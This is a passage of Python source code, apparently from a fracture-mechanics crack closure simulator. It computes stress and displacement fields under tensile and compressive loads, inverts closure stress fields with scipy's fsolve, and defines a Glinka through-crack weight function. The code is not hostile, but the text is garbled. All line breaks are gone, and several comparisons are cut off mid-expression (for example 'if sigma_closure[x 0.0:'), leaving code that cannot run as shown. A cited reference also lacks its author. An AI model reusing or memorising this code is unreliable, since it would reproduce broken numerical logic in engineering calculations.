ret_displ,dsigmaext_dxt) #####TENSILE DISPLACEMENT FUNCTION def tensile_displacement(sigma_applied,x,xt,crack_model): ##plane stress is considered u = crack_model.eval_ModeI_COD_per_unit_stress_vectorized(x,xt)*sigma_applied #if (xt > 1e-3): # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("xt exceeds 1mm") return u def solve_normalstress_tensile(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): #Initialize the external applied tensile stress starting at zero sigmaext = 0.0 # External tensile load in this step (Pa) #if sigmaext_max==0.0: # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("Zero external load") #####MAIN SUPERPOSITION LOOP #Initialize tensile stress field (function of x) sigma = np.zeros(x.shape,dtype='d') #Initialized the Displacement state as zero if calculate_displacements: tensile_displ = np.zeros(x.shape,dtype='d') pass else: tensile_displ = None pass #Initialize x step counter xt_idx = 0 use_xt2=0.0 # Before opening, sigma just increases uniformly # (Note: stress distribution may not be very accurate if # initial opening does not occur @ x=0) argmin_sigma_closure = np.argmin(sigma_closure[x < a]) min_sigma_closure=sigma_closure[x < a][argmin_sigma_closure] if min_sigma_closure > 0: # We can hold a compressive stress of min_sigma_closure # without any opening at all. uniform_tension = np.min((min_sigma_closure,sigmaext_max)) sigma += uniform_tension sigmaext += uniform_tension # assume anything to the left of the # sigma_closure minimum is open # once we get to this point #xt_idx=argmin_sigma_closure #assert(xt_idx==0) # for now, do not yet handle cases where crack starts peeling open anywhere but the center xt_idx=0 use_xt_start=x_bnd[xt_idx] use_xt2 = use_xt_start pass elif min_sigma_closure <= 0: # There is an opening point... # Find where sigma_closure goes from negative (tensile) # to positive (compressive) signchange_idxs = np.where((sigma_closure[x < a][:-1] <= 0.0) & (sigma_closure[x < a][1:] > 0.0))[0] if signchange_idxs.shape[0] > 0: xt_idx=signchange_idxs[0] if x_bnd[xt_idx+1] < a: closure_slope=(sigma_closure[xt_idx+2]-sigma_closure[xt_idx+1])/dx pass else: closure_slope=(sigma_closure[xt_idx+1]-sigma_closure[xt_idx])/dx pass assert(closure_slope > 0.0) # Project tip position backwards from x[signchange_idxs+1] use_xt_start=x[xt_idx+1]-sigma_closure[xt_idx+1]/closure_slope use_xt2 = use_xt_start pass else: # No signchange if sigma_closure[x 0.0: # have compressive (positive) closure stresses, but no signchange # ... crack must be fully closed xt_idx=0 use_xt_start=0.0 use_xt2=0.0 pass else: # crack must be fully open xt_idx = np.where(x < a)[0][-1] # open all the way to tip # if closure stress is tensile everywhere use_xt_start = a use_xt2 = a pass pass ## Use the rightmost opening point (closest to physical tip) #xt_idx=xt_idxs[-1] # #if (sigma_closure[:xt_idx] > 0.0).any(): # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("foo!") # sys.stderr.write("crackclosuresim2.crackclosure.solve_normalstress_tensile(): WARNING: Multiple opening points!\n") # pass pass else: assert(0) # shouldn't be possible pass done=False dsigmaext_dxt = np.ones(x.shape,dtype='d')*np.nan # dsigmaext_dxt is a measure of the distributed stress concentration while not done and sigmaext < sigmaext_max: (use_xt2,sigmaext, sigma, tensile_displ, dsigmaext_dxt[xt_idx]) = solve_incremental_tensilestress(x,x_bnd,sigma,sigma_closure,tensile_displ,xt_idx,dx,sigmaext,sigmaext_max,a,crack_model,calculate_displacements=calculate_displacements) if use_xt2 < x_bnd[xt_idx+1] or sigmaext==sigmaext_max or use_xt2 >= a: # Used up all of our applied load or all of our crack... Done! done=True pass if verbose: #Print what is happening in the loop print("Step: %d @ x=%f mm: %f MPa of tension held" % (xt_idx,x[xt_idx]*1e3,sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass if not done: # loop back xt_idx+=1 pass pass if sigmaext < sigmaext_max and not np.isinf(sigmaext_max): # We opened the crack to the tips without providing # the full external load. # Now the effective tip is the physical tip (at a) # # ... Apply the remaining load increment assert(use_xt2 == a) sigma_increment = np.zeros(x.shape[0],dtype='d') si_nodivzero_nonegsqrt = x-a > 1e-10*a si_divzero = (x-a >= 0) & ~si_nodivzero_nonegsqrt #sigma_increment = sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(sigmaext_max-sigmaext)*sqrt(a)/sqrt(x-a) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(a) # New (sigmaext_max - sigmaext) term is the incremental external stress field beyond the tips added in addition to the stress contcentration effect sigma_increment[si_nodivzero_nonegsqrt] = (sigmaext_max - sigmaext) + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(sigmaext_max-sigmaext)*sqrt(a)/sqrt(x[si_nodivzero_nonegsqrt]-a) sigma_increment[si_divzero]=np.inf # Limit tensile stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment > sigma_yield] = sigma_yield-sigma[sigma+sigma_increment > sigma_yield] # accumulate stresses onto sigma sigma += sigma_increment # record increment in displacement left_of_effective_tip = x < a if calculate_displacements: tensile_displ[left_of_effective_tip] += tensile_displacement(sigmaext_max-sigmaext,x[left_of_effective_tip],a,crack_model) pass # Record increment in sigmaext sigmaext = sigmaext_max if verbose: print("Step: Open to tips @ x=%f mm: %f MPa of tension held" % (a*1e3,sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass sigma_with_sigma_closure=sigma-sigma_closure*(x > use_xt_start)*(x <= a) # sigma_closure only contributes after where we started peeling it open return (use_xt2, sigma_with_sigma_closure, tensile_displ, dsigmaext_dxt) def initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements): #Initialize the external applied compressive stress (sigmaext_max negative) starting at zero sigmaext = 0.0 # External tensile load in this step (Pa) #Initialize tensile stress field (function of x) sigma = np.zeros(x.shape,dtype='d') #Initialized the Displacement state as zero if calculate_displacements: tensile_displ = np.zeros(x.shape,dtype='d') pass else: tensile_displ = None pass #Initialize x step counter xt_idx = np.where(x 1e-10*a si_divzero = (x-a >= 0) & ~si_nodivzero_nonegsqrt sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(a) # New (sigmaext_max - sigmaext) term is the incremental external stress field beyond the tips added in addition to the stress contcentration effect sigma_increment[si_nodivzero_nonegsqrt] = (fullyopen_compression) + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(fullyopen_compression)*sqrt(a)/sqrt(x[si_nodivzero_nonegsqrt]-a) sigma_increment[si_divzero]=-np.inf # Limit compressive stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment < -sigma_yield] = -sigma_yield-sigma[sigma+sigma_increment < -sigma_yield] # accumulate stresses onto sigma sigma += sigma_increment # record increment in displacement left_of_effective_tip = x < a if calculate_displacements: tensile_displ[left_of_effective_tip] += tensile_displacement(fullyopen_compression,x[left_of_effective_tip],a,crack_model) pass # Record increment in sigmaext sigmaext = fullyopen_compression if verbose: print("Step: Crack open to tip: %f MPa of compression held with no closure" % (-fullyopen_compression/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass elif max_sigma_closure >= 0: # There are closure stresses (positive compression) somewhere # Find where sigma_closure goes from negative (tensile) # to positive (compressive) signchange_idxs = np.where((sigma_closure[x < a][:-1] <= 0.0) & (sigma_closure[x < a][1:] > 0.0))[0] if signchange_idxs.shape[0] > 0: xt_idx=signchange_idxs[0] if x_bnd[xt_idx+1] < a: closure_slope=(sigma_closure[xt_idx+2]-sigma_closure[xt_idx+1])/dx pass else: closure_slope=(sigma_closure[xt_idx+1]-sigma_closure[xt_idx])/dx pass assert(closure_slope > 0.0) # Project tip position backwards from x[signchange_idxs+1] use_xt2=x[xt_idx+1]-sigma_closure[xt_idx+1]/closure_slope use_xt1 = use_xt2 pass else: # No signchange if sigma_closure[x 0.0: # have compressive (positive) closure stresses, but no signchange # ... crack must be fully closed xt_idx=0 use_xt2=0.0 use_xt1=0.0 pass else: # crack must be fully open xt_idx = np.where(x < a)[0][-1] # open all the way to tip # if closure stress is tensile everywhere use_xt2=a use_xt1=a #x_bnd[xt_idx] pass pass pass else: assert(0) # Shouldn't be possible pass return (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) def tensile_closure_from_crackopening(x,x_bnd,sigma_closure,crackopening,dx,a,sigma_yield,crack_model): """ Interpret a (possibly partly or fully) tensile closure field from a compressive closure field and a crack (half) opening displacement field. Note that this uses the half-opening not the full-opening used in softclosure.py Note that the closure field with opening displacement field representation limits us to effective tips that lie on grid boundaries whereas the tensile closure field can place the effective tip (opening point) anywhere. Note: first point of returned tensile closure will always be zero """ assert(not(((crackopening > 0.0) & (sigma_closure > 0.0)).any())) # no closure stress where crack is open assert((sigma_closure >= 0.0).all()) # no tensile closure stress positive_closure_indexes = np.where(sigma_closure > 0.0)[0] if positive_closure_indexes[0]==0: assert((crackopening == 0.0).all()) return sigma_closure # crack is entirely closed, so tensile_closure is just sigma_closure if positive_closure_indexes.shape[0]==0: # crack is entirely open xt_idx = x_bnd.shape[0]-2 pass else: xt_idx = positive_closure_indexes[0]-1 pass # xt_idx is index into x_bnd indicating start of last element that is open # also equiavlently index into x for last element that is open # also equivalently index into sigma_closure for that element or crackopening for that element (should be zero) assert((sigma_closure[xt_idx:] >= 0.0).all()) assert((crackopening[xt_idx:]==0.0).all()) sigma = np.zeros(x.shape[0],dtype='d') # stress field we are accumulating (positive tensile) that superimposes with the positive compressive sigma_closure tensile_displ = copy.deepcopy(crackopening) sigmaext = 0.0 sigmaext_max = -np.inf # Now try closing the crack one step at a time tensile_closure = copy.deepcopy(sigma_closure) while xt_idx >= 1: use_xt2 = x_bnd[xt_idx+1] # use_xt2 is the starting tip position for this compressive step use_xt1 = x_bnd[xt_idx] # use_xt1 is the ending tip position for this compressive step # use_xt2 and use_xt2 bound the element at x[xt_idx] # There is no substantial COD (just infinitesimal) of this element as the crack closes from use_xt2 to use_xt1 # So we calculate the "tensile closure" on this region to close the element to its left, centered at x[xt_idx-1] #(use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) # calculate as in tensile_displacement() to get an incremental displacement that zeros the displacement in this region... # Determine sigmaext2-sigmaext on this basis... # # Solving objective function... our given sigma_closure at xt_idx must be zero # # but the sigma_closure in the objective function should be the tensile closure. # # whereas sigmaext2 is now given # Since sigmaext2 = sigmaext1 - (xt2-xt1)*F # then F = -(sigmaext2-sigmaext1)/(xt2-xt1) # ... So we don't need to solve with the objective function. # ... We can call integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model) # to obtain sigma_increment # at position xt_idx, per the objective function, sigma+sigma_increment-sigma_closure == 0 # where sigma_closure is our tensile closure field. # So we can now calculate the tensile closure field value at this position. # Then accumulate sigma into sigma_increment, add in calculated displacement field # (which should almost exactly zero out displacement at this position), # and repeat. du_dsigma = crack_model.u_per_unit_stress(crack_model,x[xt_idx-1],x[xt_idx]) # Displacement of x[xt_idx-1] with effective tip at x[xt_idx] # delta_sigma_ext is negative... external loading increment required to close crack at x[xt_idx-1] delta_sigma_ext = - tensile_displ[xt_idx-1]/du_dsigma # sigmaext is starting load (negative for compression) # sigmaext2 is the ending load (negative for compression, # more negative than sigmaext1 sigmaext2 = sigmaext + delta_sigma_ext F = -delta_sigma_ext/(use_xt2-use_xt1) # F is positive... measures closure gradient # integral_compressivestress_shrinking_effective_crack_length_byxt recalculates # sigmaext2 internally, but result will match our value to machine precision (icseclb_use_xt1,icseclb_sigmaext2,sigma_increment) = integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,use_xt1,use_xt2,crack_model) incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = x[xt_idx] # (use_xt1+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) tensile_closure[xt_idx] = sigma_increment[xt_idx] # extract tensile_closure value for this point # Add in effects of this step sigma+=sigma_increment tensile_displ += incremental_displacement assert(abs(tensile_displ[xt_idx-1]) < 1e-12) # Verify that ultimate displacement of our point-to-the-left is what it was supposed to be # increment to next step sigmaext = sigmaext2 xt_idx-=1 pass # in the final state, sigma + tensile_closure superimpose return tensile_closure def crackopening_from_tensile_closure(x,x_bnd,sigma_closure,dx,a,sigma_yield,crack_model): """Based on the assumed closure model, whereby we give a meaning to "tensile" closure stresses -- based on the compressive loading required to close the crack to that point -- we can determine an opening profile for the unloaded crack. This function calculates that crack opening... Note that this gives the half-opening as opposed to the full-opening used in softclosure.py""" sigmaext_max=-np.inf # as much external compression as we need (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) = initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) done=False #if sigmaext==sigmaext_max: # # Used up all of our applied load... Done! # done=True # pass while not done: (use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) if use_xt1 <= 0.0: # Used up all of our crack... Done! done=True pass #if verbose: # #Print what is happening in the loop # print("Step: %d @ x=%f mm: %f MPa of compression held" % (xt_idx,x[xt_idx]*1e3,-sigmaext/1e6)) # if calculate_displacements: # print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) # pass # pass xt_idx-=1 use_xt2=use_xt1 if not done: assert(x_bnd[xt_idx+1]==use_xt2) pass pass return -tensile_displ def solve_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): #####MAIN SUPERPOSITION LOOP (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) = initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements) #assert((sigma <= 0.0).all()) done=False #if sigmaext==sigmaext_max: # # Used up all of our applied load... Done! # done=True # pass dsigmaext_dxt = np.ones(x.shape,dtype='d')*np.nan # dsigmaext_dxt is a measure of the distributed stress concentration while not done and sigmaext > sigmaext_max: (use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt[xt_idx]) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=calculate_displacements) if use_xt1 > x_bnd[xt_idx] or sigmaext==sigmaext_max or use_xt1 <= 0.0: # Used up all of our applied load or all of our crack... Done! done=True pass if verbose: #Print what is happening in the loop print("Step: %d @ x=%f mm: %f MPa of compression held" % (xt_idx,x[xt_idx]*1e3,-sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass if not done: # loop back #assert(x_bnd[xt_idx+1]==use_xt2) xt_idx-=1 use_xt2=use_xt1 pass pass if use_xt1 <= 0.0: # We closed the crack fully without accepting # the full external load. # ... Apply the remaining load increment, # which will be held uniformly across the sample if not np.isinf(sigmaext_max): uniform_tension = (sigmaext_max-sigmaext) # negative number sigma += uniform_tension sigmaext += uniform_tension #assert((sigma <= 0.0).all()) if verbose: print("Step: Closed to center: %f MPa of compression held" % (sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass pass #assert((sigma <= 0.0).all()) #sigma_with_sigma_closure=sigma-sigma_closure*(x > use_xt1)*(x <= a) # sigma_closure only contributes after the effective tip sigma_with_sigma_closure=sigma.copy() # sigma_closure should be superimposed with the # external load effect sigma over the entire region # where the crack is closed. # this is presumbly true everywhere beyond the current segment up to the crack length a WE SHOULD PROBABLY DEAL BETTER WITH THE LAST SEGMENT AT THE TIP! sigma_with_sigma_closure[(xt_idx+1):][x[(xt_idx+1):] <= a] -= sigma_closure[xt_idx+1:][x[(xt_idx+1):] <= a] # The current segment (indexd by xt_idx) may be partial, # so weight it according to the portion that is actually closed sigma_with_sigma_closure[xt_idx] -= sigma_closure[xt_idx]*(use_xt2-use_xt1)/dx; # correct any small residual tension if sigma_with_sigma_closure[xt_idx] > 0.0: sigma_with_sigma_closure[xt_idx]=0.0 pass #assert((sigma_with_sigma_closure <= 0.0).all()) return (use_xt1, sigma_with_sigma_closure, tensile_displ, dsigmaext_dxt) def solve_normalstress(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): """NOTE: sigma_closure is positive compressive; pretty much everything else is positive tensile. NOTE: Modified to return a sigma that is a physical contact stress, INCLUDING the effect of sigma_closure """ if sigmaext_max >= 0.0: return solve_normalstress_tensile(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=verbose,diag_plots=diag_plots,calculate_displacements=calculate_displacements) else: return solve_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=verbose,diag_plots=diag_plots,calculate_displacements=calculate_displacements) pass def inverse_closure(reff,seff,x,x_bnd,dx,xt,sigma_yield,crack_model,verbose=False): """ Given effective crack lengths reff at externally applied loads seff, calculate a closure stress field that produces such a field. reff,seff presumed to be ordered from most compressive to most tensile. seff is positive for tensile opening loads returns sigma_closure that is positive for compressive closure stresses. """ sigma_closure = np.zeros(x.shape,dtype='d') last_closure = seff[0] # If everything is closed, then closure stresses and external loads match. last_reff = reff[0] firstiteration=True # NOTE: Always iterate starting at step 1, then back to 0 # then back to 1, then increasing. # The reason for this is to get a reasonable extrapolation # to the left of the given data. # # Basically, the first iteration at step 1 uses # seff[0] as an approximation for the closure state # from the (non-executed) step 0. # Then execute step 0 based on that initial result to get # a slope we can extrapolate (don't allow the slope to be negative... # if it would be, just make it zero -- straight horizontal) # all the way to the crack center. # Once this is done, rerun step 1 based on the step zero # result and continue from there. for lcnt in [1,0]+list(range(1,reff.shape[0])): # In each step, we solve for a new linear segment # of the sigma_closure distribution. # we assume last_closure is the end closure stress # from the previous step, corresponding to a # position of reff[lcnt-1], with an # external load of seff[lcnt-1] opening the # crack to this point #print("lcnt=%d" % (lcnt)) #if lcnt==7: # import pdb # pdb.set_trace() # pass # So at this step, if the new closure stress is # new_closure, then # in between we have a line: # sigma_closure(x) = last_closure + (new_closure-last_closure)*(x-reff[lcnt-1]) # So we need to iteratively solve for a new_closure that satisfies # (reff[lcnt], sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure,dx,seff[lcnt],a,sigma_yield,crack_model) # For the given reff[lcnt], seff[lcnt] #if reff[lcnt] < last_reff+dx/10.0: # # if the opening step is too small, skip this iteration # # to avoid dividing by zero # continue if lcnt==1 and firstiteration: # first iteration: extrapolate back to crack center # if necessary ***!!!! May want to fix this #new_zone = (x_bnd[:-1] <= reff[lcnt]) # providing closure stresses to right of closure point is useful # because intermediate calculations may examine more open cases, # and having nice behavior here improves convergence new_zone=np.ones(x.shape,dtype=np.bool) #new_zone = (x_bnd[1:] >= reff[lcnt]) #open_zone = (x_bnd[1:] < reff[lcnt]) pass elif lcnt==0: # Iteration at position zero after initialization at lcnt==1 #new_zone = (x_bnd[1:] < reff[lcnt]) new_zone=np.ones(x.shape,dtype=np.bool) if np.count_nonzero(new_zone)==0: # nothing to do continue zone_following = (x_bnd[1:] >= reff[lcnt+1]) zone_following_start = np.where(zone_following)[0][0] pass else: #new_zone = (x_bnd[1:] >= reff[lcnt-1]) & (x_bnd[:-1] <= reff[lcnt]) #new_zone = (x_bnd[1:] >= reff[lcnt-1]) new_zone = (x_bnd[1:] >= last_reff) pass if lcnt != 0: # (these values are not used for lcnt==0) zone_start = np.where(x_bnd[1:] >= last_reff)[0][0] zone_end = np.where(x_bnd[:-1] <= reff[lcnt])[0][-1] zone_prev = max(0,zone_start-1) pass #print("np.where(new_zone) = %s" % (str(np.where(new_zone)))) def goal(new_closure): new_closure_field = copy.copy(sigma_closure) # WARNING: All changes that affect new_closure_field in goal() # MUST ALSO BE APPLIED to generating sigma_closure after the optimization !!! if lcnt==1 and firstiteration: new_closure_field[new_zone] = seff[0] + (new_closure-seff[0]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev]) pass elif lcnt==0: if new_closure >= sigma_closure[zone_following_start]: # use straight horizontal new_closure_field[new_zone] = new_closure pass else: # Connect with slope new_closure_field[new_zone] = sigma_closure[zone_following_start] + (new_closure-sigma_closure[zone_following_start]) * (x[new_zone]-x[zone_following_start])/(0.0-x[zone_following_start]) pass pass else: # draw straight line between zone_prev and new_zone. Use np.max() to prevent new_closure_field from being negative. new_closure_field[new_zone] = np.max((np.zeros(np.count_nonzero(new_zone),dtype='d'),sigma_closure[zone_prev] + (new_closure-sigma_closure[zone_prev]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev])),axis=0) pass (gotreff, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,new_closure_field,dx,seff[lcnt],xt,sigma_yield,crack_model,calculate_displacements=False,verbose=verbose) return gotreff-reff[lcnt] if lcnt==0: # For position 0, resulting solution # may be less than seff[0] or even negative max_sol_attempts=300 first_initialization_factor=0.03 initialization_scale_factor=-1.05 seed=max(abs(seff[-1]-seff[0]),seff[0],np.mean(seff)) pass else: max_sol_attempts=20 first_initialization_factor=1.0 initialization_scale_factor=1.1 seed = seff[lcnt] pass solvecnt=0 if lcnt > 1 and not firstiteration and goal(-np.inf) < 0.0: # Applying # no increment isn't enough to get # it to open this far under this load... # Use the most extreme value possible new_closure = -np.inf pass else: inifactor=first_initialization_factor while solvecnt < max_sol_attempts: (new_closure,infodict,ier,mesg) = scipy.optimize.fsolve(goal,seed*inifactor,full_output=True) #print("ier=%d; new_closure=%g" % (ier,new_closure[0])) if ier==1: break inifactor*=initialization_scale_factor solvecnt+=1 pass if ier != 1: if lcnt > 0 and last_reff >= xt-dx/4.0: # if we don't converge and previous step was within # a quarter-step of the end, claim we are good # and quit. break sys.modules["__main__"].__dict__.update(globals()) sys.modules["__main__"].__dict__.update(locals()) raise ValueError("Error in inverse_closure fsolve: %s" % str(mesg)) pass #closure_gradient = (sigma_closure[zone_end]-sigma_closure[zone_start])/(x[zone_end]-x[zone_start]) # WARNING: All changes that affect sigma_closure here # MUST ALSO BE APPLIED to generating new_closure_field in goal()!!! if lcnt==1 and firstiteration: sigma_closure[new_zone] = seff[0] + (new_closure-seff[0]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev]) pass elif lcnt==0: if new_closure >= sigma_closure[zone_following_start]: # use straight horizontal sigma_closure[new_zone] = new_closure pass else: # Connect with slope sigma_closure[new_zone] = sigma_closure[zone_following_start] + (new_closure-sigma_closure[zone_following_start]) * (x[new_zone]-x[zone_following_start])/(0.0-x[zone_following_start]) pass pass else: # draw straight line between zone_prev and new_zone. Use np.max() to prevent sigma_closure from being negative. sigma_closure[new_zone] = np.max((np.zeros(np.count_nonzero(new_zone),dtype='d'),sigma_closure[zone_prev] + (new_closure-sigma_closure[zone_prev]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev])),axis=0) pass #print("sigma_closures %s" % (str(sigma_closure))) #print("new_zone closures: %s" % (str(sigma_closure[new_zone][:2]))) firstiteration=False last_closure = new_closure last_reff = reff[lcnt] pass #if reff[lcnt] < xt: # # don't have data out to the tips # # extrapolate last closure gradient to the tips # # new_zone = (x_bnd > reff[lcnt]) # zone_start = np.where(new_zone)[0] # zone_end = np.where # new_closure=last_closure + closure_gradient * (xt-x[zone_start]) # # sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (x[new_zone]-reff[lcnt])/(xt-reff[lcnt]) # # pass sigma_closure[x > xt] = 0.0 ## Extrapolate first to points back to the origin (open zone #first_closure_index = np.where(~open_zone)[0][0] #initial_slope = (sigma_closure[first_closure_index+1]-sigma_closure[first_closure_index])/dx #sigma_closure[open_zone] = sigma_closure[first_closure_index] + (x[open_zone]-x[first_closure_index])*initial_slope return sigma_closure def inverse_closure_backwards_broken(reff,seff,x,x_bnd,dx,xt,sigma_yield,crack_model,verbose=False): """ Given effective crack lengths reff at externally applied loads seff, calculate a closure stress field that produces such a field. reff,seff presumed to be ordered from most compressive to most tensile. seff is positive for tensile opening loads returns sigma_closure that is positive for compressive closure stresses. if seff[0] is > 0, and reff[0] > 0 then sigma_closure corresponding to reff[0] is assumed to match seff[0]. NOTE: This version implements it backwards (tip to center) and is broken """ assert((np.diff(seff) > 0).all()) # for a crack with no closure stresses, even an epsilon # tensile opening causes the crack to open to the tips. # We work back from the tips. # at the last, radius, stress combination # there is no load on the crack surface except past # that last radius. # # sigma_closure is positive compression. sigma_closure = np.zeros(x.shape,dtype='d') last_r = xt last_closure = None for lcnt in range(reff.shape[0]-1,-1,-1): # In each step, we solve for a new linear segment # of the sigma_closure distribution. # we assume last_closure is the end closure stress # from the previous step, corresponding to a # position of reff[lcnt+1], with an # external load of seff[lcnt+1] opening the # crack to this point # So at this step, if the new closure stress is # new_closure, then # in between we have a line: # sigma_closure(x) = last_closure + (new_closure-last_closure)*(x-reff[lcnt+1]) # So we need to iteratively solve for a new_closure that satisfies # (reff[lcnt], sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure,dx,seff[lcnt],a,sigma_yield,crack_model) # For the given reff[lcnt], seff[lcnt] if lcnt==reff.shape[0]-1: # first iteration: Don't know stress to open to tip # (unless this is tip!) #new_zone = (x >= reff[lcnt]) & (x <= xt) new_zone = (x_bnd[1:] >= reff[lcnt]) & (x_bnd[:-1] <= xt) pass else: new_zone = (x_bnd[1:] >= reff[lcnt]) & (x_bnd[:-1] <= reff[lcnt+1]) #new_zone = (x >= reff[lcnt]) & (x < reff[lcnt+1]) pass def goal(new_closure): new_closure_field = copy.copy(sigma_closure) if last_closure is not None: new_closure_field[new_zone] = last_closure + (new_closure-last_closure) * (reff[lcnt+1]-x[new_zone])/(reff[lcnt+1]-reff[lcnt]) # slope # slope pass else: new_closure_field[new_zone] = new_closure # Horizontal line pass (gotreff, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,new_closure_field,dx,seff[lcnt],xt,sigma_yield,crack_model,calculate_displacements=False,verbose=verbose) return gotreff-reff[lcnt] if reff[lcnt] < last_r and np.count_nonzero(new_zone) > 0: (new_closure,infodict,ier,mesg) = scipy.optimize.fsolve(goal,seff[lcnt]*3.4,full_output=True) if ier != 1: sys.modules["__main__"].__dict__.update(globals()) sys.modules["__main__"].__dict__.update(locals()) raise ValueError("Error in inverse_closure fsolve: %s" % str(mesg)) if last_closure is not None: sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (reff[lcnt+1]-x[new_zone])/(reff[lcnt+1]-reff[lcnt]) # slope pass else: sigma_closure[new_zone] = new_closure # Horizontal line pass last_closure = new_closure last_r = reff[lcnt] pass pass #if reff[lcnt] < xt: # # don't have data out to the tips # # extrapolate last closure gradient to the tips # # new_zone = (x >= reff[lcnt]) # new_closure=last_closure + closure_gradient * (xt-reff[lcnt]) # # sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (x[new_zone]-reff[lcnt])/(xt-reff[lcnt]) # # pass sigma_closure[x > xt] = 0.0 return sigma_closure class Glinka_ModeI_ThroughCrack(ModeI_Beta_WeightFunction): """Create and return ModeI_crack_model corresponding to the Through crack weight function from the Glinka paper""" def __init__(self,Eeff,x,width,epsx): def weightfun_through_times_sqrt_aminx(x, a, w): # Weight function (stress intensity factor resulting from point load on crack surface) for a through crack or tunnel crack # reference: . "Development of weight functions and computer integration procedures for calculating stress intensity factors around cracks subjected to complex stress fields." Stress and Fatigue-Fracture Design, Petersburg Ontario, Canada, Progress Report 1.1 (1996): 1. # x=position, # a=half-crack length (not always physical total length, but may be an effective length for partially closed crack) # w=half-width of geometry (same axis as x and a) M1 = 0.06987 + 0.40117*(a/w) - 5.5407*(a/w)**2.0 + 50.0886*(a/w)**3.0 - 200.699*(a/w)**4.0 + 395.552*(a/w)**5.0 - 377.939*(a/w)**6.0 + 140.218*(a/w)**7.0 M2 = 0.09049 - 2.14886*(a/w) + 22.5325*(a/w)**2.0 - 89.6553*(a/w)**3.0 + 210.599*(a/w)**4.0 - 239.445*(a/w)**5.0 + 111.128*(a/w)**6.0 M3 = 0.427216 + 2.56001*(a/w) - 29.6349*(a/w)**2.0 + 138.40*(a/w)**3.0 - 347.255*(a/w)**4.0 + 457.128*(a/w)**5.0 - 295.882*(a/w)**6.0 + 68.1575*(a/w)**7.0 return (2.0/np.sqrt(2*np.pi))*(1.0+M1*scipy.sqrt(1.0-x/a)+M2*(1.0-x/a)+M3*(1.0-x/a)**1.5) super(Glinka_ModeI_ThroughCrack, self).__init__( weightfun_times_sqrt_aminx=lambda obj,x,a: 